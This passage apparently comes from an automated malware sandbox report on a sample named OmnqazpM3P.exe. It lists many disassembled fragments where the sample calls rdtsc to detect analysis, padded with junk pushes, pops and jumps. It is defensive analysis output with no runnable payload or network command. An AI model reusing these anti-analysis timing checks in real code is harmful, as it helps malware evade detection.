0x00000047 pop ecx 0x00000048 ret 0x00000049 mov bl, F7h 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 pop edx 0x00000051 jmp 00007F8D15422250h 0x00000056 popad 0x00000057 push eax 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b jl 00007F8D15422246h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DB667 second address: 9DB66B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D0276 second address: 9D029E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8D1542225Ah 0x00000008 jmp 00007F8D15422254h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jl 00007F8D1542224Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D2219 second address: 9D221D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D1298 second address: 9D12A2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8D15422246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D361B second address: 9D361F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DB66B second address: 9DB671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D221D second address: 9D2222 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D361F second address: 9D3623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DB671 second address: 9DB676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D2222 second address: 9D222E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D3623 second address: 9D3629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DB676 second address: 9DB67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D6566 second address: 9D6571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F8D1541FE06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DC686 second address: 9DC6A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422258h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DC6A9 second address: 9DC6BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DC6BE second address: 9DC724 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8D15422248h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F8D15422248h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+1244B39Dh], ebx 0x0000002d push 00000000h 0x0000002f movzx ebx, si 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F8D15422248h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f jl 00007F8D15422250h 0x00000055 pushad 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DD728 second address: 9DD72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DD72C second address: 9DD730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DD730 second address: 9DD736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E15C0 second address: 9E15C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E15C4 second address: 9E15DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8D1541FE0Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E59A1 second address: 9E59A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E59A5 second address: 9E59E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8D1541FE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F8D1541FE1Dh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F8D1541FE15h 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a jmp 00007F8D1541FE0Ah 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 jnl 00007F8D1541FE06h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E5167 second address: 9E519C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F8D15422258h 0x00000011 jg 00007F8D15422252h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E519C second address: 9E51A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E51A2 second address: 9E51B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8D1542224Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E51B7 second address: 9E51BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D762E second address: 9D7634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D7634 second address: 9D763D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D763D second address: 9D7641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E55B5 second address: 9E55B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E55B9 second address: 9E55BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E55BD second address: 9E55C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DB7CD second address: 9DB7DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F8D15422246h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9DC866 second address: 9DC87D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8D1541FE0Ch 0x00000008 jng 00007F8D1541FE06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E8D82 second address: 9E8D8C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8D1542224Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E8D8C second address: 9E8D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E8D99 second address: 9E8D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E8D9D second address: 9E8DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E8DA1 second address: 9E8DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E8DA7 second address: 9E8DDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F8D1541FE19h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9E8EE2 second address: 9E8EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 988BD7 second address: 988BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F8D1541FE11h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9EF5AC second address: 9EF5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9EF5B0 second address: 9EF5BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9EF5BE second address: 9EF5F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422256h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8D15422250h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9EF5F2 second address: 9EF5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9EF5F8 second address: 9EF5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9EF8B0 second address: 9EF8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9EF9FF second address: 9EFA05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9EFB2E second address: 9EFB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F504E second address: 9F5054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F51EF second address: 9F51F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F54FA second address: 9F54FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F54FE second address: 9F551E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1541FE16h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F551E second address: 9F5533 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8D15422246h 0x00000008 jmp 00007F8D1542224Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F5533 second address: 9F5538 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F4C08 second address: 9F4C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F4C0C second address: 9F4C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8D1541FE0Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F58EB second address: 9F58FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8D1542224Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F58FC second address: 9F5901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F5901 second address: 9F5913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1542224Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F5913 second address: 9F591B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F591B second address: 9F5921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F5921 second address: 9F5927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F5927 second address: 9F593A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F8D15422246h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F593A second address: 9F593E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F593E second address: 9F5950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8D1542224Ch 0x0000000c jnc 00007F8D15422246h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F5950 second address: 9F5967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE11h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9F5F10 second address: 9F5F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 981F24 second address: 981F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FCAA4 second address: 9FCAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FCAAA second address: 9FCAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FCAAE second address: 9FCABA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8D15422246h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C3B2E second address: 9C3B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C3B34 second address: 9C3B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C3CB0 second address: 9C3D1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8D1541FE0Fh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jnp 00007F8D1541FE15h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jmp 00007F8D1541FE14h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8D1541FE10h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C3D1A second address: 9C3D2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C3D2A second address: 9C3D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F8D1541FE08h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b or edx, dword ptr [ebp+122D2CC2h] 0x00000031 push 99DAC384h 0x00000036 push eax 0x00000037 push edx 0x00000038 jnp 00007F8D1541FE08h 0x0000003e push esi 0x0000003f pop esi 0x00000040 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C3E14 second address: 9C3E19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C40D1 second address: 9C40D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C4217 second address: 9C4221 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8D1542224Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C45EF second address: 9C466E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F8D1541FE08h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov edi, 06BC8BDDh 0x0000002a call 00007F8D1541FE0Dh 0x0000002f cmc 0x00000030 pop edx 0x00000031 push 0000001Eh 0x00000033 or dword ptr [ebp+122D2706h], eax 0x00000039 nop 0x0000003a jmp 00007F8D1541FE0Eh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F8D1541FE11h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C47EF second address: 9C47F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C47F3 second address: 9C47FD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8D1541FE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C47FD second address: 9C4807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8D15422246h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C4ABC second address: 9AC18B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 clc 0x00000009 lea eax, dword ptr [ebp+124784CFh] 0x0000000f mov dword ptr [ebp+122D27CDh], edx 0x00000015 jo 00007F8D1541FE09h 0x0000001b movzx ecx, bx 0x0000001e push eax 0x0000001f jmp 00007F8D1541FE0Ch 0x00000024 mov dword ptr [esp], eax 0x00000027 or dx, 60A6h 0x0000002c lea eax, dword ptr [ebp+1247848Bh] 0x00000032 jns 00007F8D1541FE06h 0x00000038 nop 0x00000039 push ebx 0x0000003a push eax 0x0000003b jbe 00007F8D1541FE06h 0x00000041 pop eax 0x00000042 pop ebx 0x00000043 push eax 0x00000044 jmp 00007F8D1541FE15h 0x00000049 nop 0x0000004a sbb edx, 7003A916h 0x00000050 call dword ptr [ebp+122D26E4h] 0x00000056 jp 00007F8D1541FE20h 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F8D1541FE0Dh 0x00000063 je 00007F8D1541FE18h 0x00000069 jc 00007F8D1541FE06h 0x0000006f jmp 00007F8D1541FE0Ch 0x00000074 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9AC18B second address: 9AC190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9AC190 second address: 9AC196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FD04B second address: 9FD050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
